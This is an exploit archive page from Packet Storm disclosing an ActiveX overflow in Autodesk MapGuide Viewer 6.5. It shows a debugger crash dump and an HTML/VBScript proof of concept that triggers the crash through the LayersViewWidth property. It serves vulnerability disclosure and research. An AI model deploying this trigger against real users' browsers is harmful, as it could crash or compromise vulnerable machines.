what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Autodesk MapGuide Viewer Overflow

Autodesk MapGuide Viewer Overflow
Posted Sep 1, 2010
Authored by d3b4g

Autodesk MapGuide Viewer version 6.5 suffers from an Active-X related overflow vulnerability in MGAXCTRL.DLL.

tags | exploit, overflow, activex
SHA-256 | b80514466ac4b3172c33af964fa09b1de9d10ee0d597300d79654121f85f1056

Autodesk MapGuide Viewer Overflow

Change Mirror Download
# Exploit Title: Autodesk MapGuide Viewer ActiveX(MGAXCTRL.DLL)Overflow Vulnerability
# Date: [01-09-2010]
# Author: [d3b4g]
# Software Link: http://usa.autodesk.com/adsk/servlet/item?siteID=123112&id=9454821
# Version: [6.5]
# Tested on: [Winxp SP3]
# regards to ROL guys





Exception Code: ACCESS_VIOLATION
Disasm: 175CE9E CMP DWORD PTR [ESI+1C],0 (MGAXCTRL.DLL)

Seh Chain:
--------------------------------------------------
1 192847C MGAXCTRL.DLL
2 73352542 VBSCRIPT.dll
3 7C839AD8 KERNEL32.dll



Registers:
--------------------------------------------------
EIP 0175CE9E
EAX 00000001
EBX 003EB690 -> 0193F684
ECX 00000000
EDX 003E0608 -> 00180F98
EDI 003EB5D8 -> 0193FC24
ESI 00000404
EBP 0013EA84 -> 0013EAA0
ESP 0013EA58 -> 003EB644



ArgDump:
--------------------------------------------------
EBP+8 003EB644 -> 0193F90C
EBP+12 00000000
EBP+16 0013EAD4 -> 00130000
EBP+20 0042C4F4 -> 00110024
EBP+24 0013EA94 -> 0013EAD4
EBP+28 0013EB30 -> 0013EBC0


Block Disassembly:
--------------------------------------------------
175CE8F POP ESI
175CE90 JMP [EAX+60]
175CE93 PUSH ESI
175CE94 LEA ESI,[ECX+404]
175CE9A TEST ESI,ESI
175CE9C JE SHORT 0175CEC2
175CE9E CMP DWORD PTR [ESI+1C],0 <--- CRASH
175CEA2 JE SHORT 0175CEC2
175CEA4 PUSH 0
175CEA6 PUSH DWORD PTR [ESP+C]
175CEAA MOV ECX,ESI
175CEAC PUSH 0
175CEAE CALL 01912C63
175CEB3 MOV EAX,[ESI]
175CEB5 MOV ECX,ESI





PoC:


<object classid='clsid:62789780-B744-11D0-986B-00609731A21D' id='target' />
<script language='vbscript'>

'File Generated by COMRaider v0.0.133 - http://labs.idefense.com

'Wscript.echo typename(target)

'for debugging/custom prolog
targetFile = "C:\Program Files\Autodesk\MapGuideViewerActiveX6.5\MgAxCtrl.dll"
prototype = "Property Let LayersViewWidth As Long"
memberName = "LayersViewWidth"
progid = "MGMapControl.MGMap"
argCount = 1

arg1=0

target.LayersViewWidth = arg1

</script>

Login or Register to add favorites

File Archive:

February 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    16 Files
  • 2
    Feb 2nd
    19 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    2 Files
  • 7
    Feb 7th
    10 Files
  • 8
    Feb 8th
    25 Files
  • 9
    Feb 9th
    37 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    20 Files
  • 14
    Feb 14th
    25 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    6 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    35 Files
  • 20
    Feb 20th
    25 Files
  • 21
    Feb 21st
    18 Files
  • 22
    Feb 22nd
    15 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    10 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close